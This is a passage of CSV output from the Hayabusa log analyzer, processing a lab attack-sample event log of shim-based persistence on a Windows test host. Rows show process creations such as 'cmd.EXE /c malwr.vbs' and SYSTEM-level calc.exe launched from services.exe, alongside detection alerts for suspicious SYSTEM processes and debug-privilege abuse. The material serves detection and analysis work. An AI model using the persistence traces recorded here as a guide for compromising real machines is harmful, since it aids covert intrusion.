365ABB72-5851-5C91-0000-00107D050A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:10:34.489 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe $(Arg0) | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 792 | PGUID: 365ABB72-5ACA-5C91-0000-0010DC1E0B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:54.257 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2884 | PGUID: 365ABB72-5CBE-5C91-0000-001017150C00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:18:57.202 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Process: C:\Windows\System32\mmc.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3856 | PGUID: 365ABB72-5CC1-5C91-0000-0010DD2F0C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File Extension,,../hayabusa-rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:20:32.298 +09:00,PC01.example.corp,13,medium,Persis,Registry Modification to Hidden File 
Extension,,../hayabusa-rules/sigma/registry_event/win_re_hidden_extention.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:21:05.306 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3568 | PGUID: 365ABB72-5D41-5C91-0000-0010D9080F00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:28.886 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\System32\rundll32.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x33435 | PID: 3840 | PGUID: 365ABB72-5D94-5C91-0000-001080E90F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:22:33.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\Windows NT\Accessories\WORDPAD.EXE"" ""C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb"" | Process: C:\Program Files\Windows NT\Accessories\wordpad.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Windows\system32\rundll32.exe"" C:\Windows\system32\shell32.dll,OpenAs_RunDLL C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | LID: 0x33435 | PID: 900 | PGUID: 365ABB72-5D99-5C91-0000-001051FA0F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:05.397 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 
| Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2600 | PGUID: 365ABB72-5E6D-5C91-0000-001073BA1000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:26:08.852 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x33435 | PID: 2760 | PGUID: 365ABB72-5E70-5C91-0000-00107EBE1000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:31:05.509 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 572 | PGUID: 365ABB72-5F99-5C91-0000-0010B5421100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:36:05.610 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 1748 | PGUID: 365ABB72-60C5-5C91-0000-001061C31100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:05.702 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 2400 | PGUID: 
365ABB72-61F1-5C91-0000-0010554C1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:11.440 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 3364 | PGUID: 365ABB72-61F7-5C91-0000-001032511200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x33435 | PID: 2340 | PGUID: 365ABB72-61FD-5C91-0000-0010536A1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:17.339 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x33435 | PID: 3668 | PGUID: 365ABB72-61FD-5C91-0000-0010E26A1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.290 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2952 | PGUID: 
365ABB72-61FE-5C91-0000-001035771200",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 06:41:18.410 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\servicing\TrustedInstaller.exe | Process: C:\Windows\servicing\TrustedInstaller.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-61FE-5C91-0000-0010DF7F1200,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.576 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-777E-5C91-0000-00102B4B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:49.856 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-777E-5C91-0000-0010864D0000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.157 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: 
\SystemRoot\System32\smss.exe 00000001 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-777F-5C91-0000-00105E500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-777F-5C91-0000-001079500000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.217 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-777F-5C91-0000-0010BF500000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.387 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 456 | PGUID: 
365ABB72-777F-5C91-0000-0010D8520000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.427 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-777F-5C91-0000-00100B590000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.467 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 524 | PGUID: 365ABB72-777F-5C91-0000-0010B95B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:50.497 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 532 | PGUID: 365ABB72-777F-5C91-0000-0010EA5B0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.308 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 640 | PGUID: 365ABB72-7780-5C91-0000-00103C730000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 
+2019-03-20 08:18:51.599 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 704 | PGUID: 365ABB72-7780-5C91-0000-0010CFB00000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.679 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 904 | PGUID: 365ABB72-7781-5C91-0000-001040B90000",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:51.789 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1016 | PGUID: 365ABB72-7781-5C91-0000-001036CB0000,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.111 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1140 | PGUID: 365ABB72-7782-5C91-0000-00102D0B0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.501 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: 
C:\Windows\system32\svchost.exe | PID: 1040 | PGUID: 365ABB72-7781-5C91-0000-0010C2CC0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.571 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1412 | PGUID: 365ABB72-7783-5C91-0000-0010DB2C0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1536 | PGUID: 365ABB72-7783-5C91-0000-001025410100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:53.922 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.102 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-7794-5C91-0000-0010DF510100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | 
Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-77A2-5C91-0000-00106D560100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-77A2-5C91-0000-00100A570100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.172 +09:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-77A2-5C91-0000-001006590100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.182 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process 
Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.593 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1820 | PGUID: 365ABB72-77C0-5C91-0000-00106C740100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.603 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.623 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Temp\wodCmdTerm.exe | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | PID: 1788 | PGUID: 365ABB72-77C0-5C91-0000-001044720100,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.783 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""taskhost.exe"" | Process: C:\Windows\System32\taskhost.exe | User: EXAMPLE\user01 | Parent Cmd: 
C:\Windows\system32\services.exe | LID: 0x17dad | PID: 1960 | PGUID: 365ABB72-77C4-5C91-0000-001013850100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.793 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: atbroker.exe | Process: C:\Windows\System32\AtBroker.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1972 | PGUID: 365ABB72-77C4-5C91-0000-001011860100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:54.813 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\slui.exe"" | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x17dad | PID: 1988 | PGUID: 365ABB72-77C4-5C91-0000-0010EA870100",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1100 | PGUID: 365ABB72-77DE-5C91-0000-00105EA30100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.224 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT 
AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1308 | PGUID: 365ABB72-77FC-5C91-0000-0010E8C10100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.404 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1560 | PGUID: 365ABB72-781A-5C91-0000-001013CD0100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.514 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1696 | PGUID: 365ABB72-7838-5C91-0000-0010E0D60100,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-20 08:18:55.544 +09:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process 
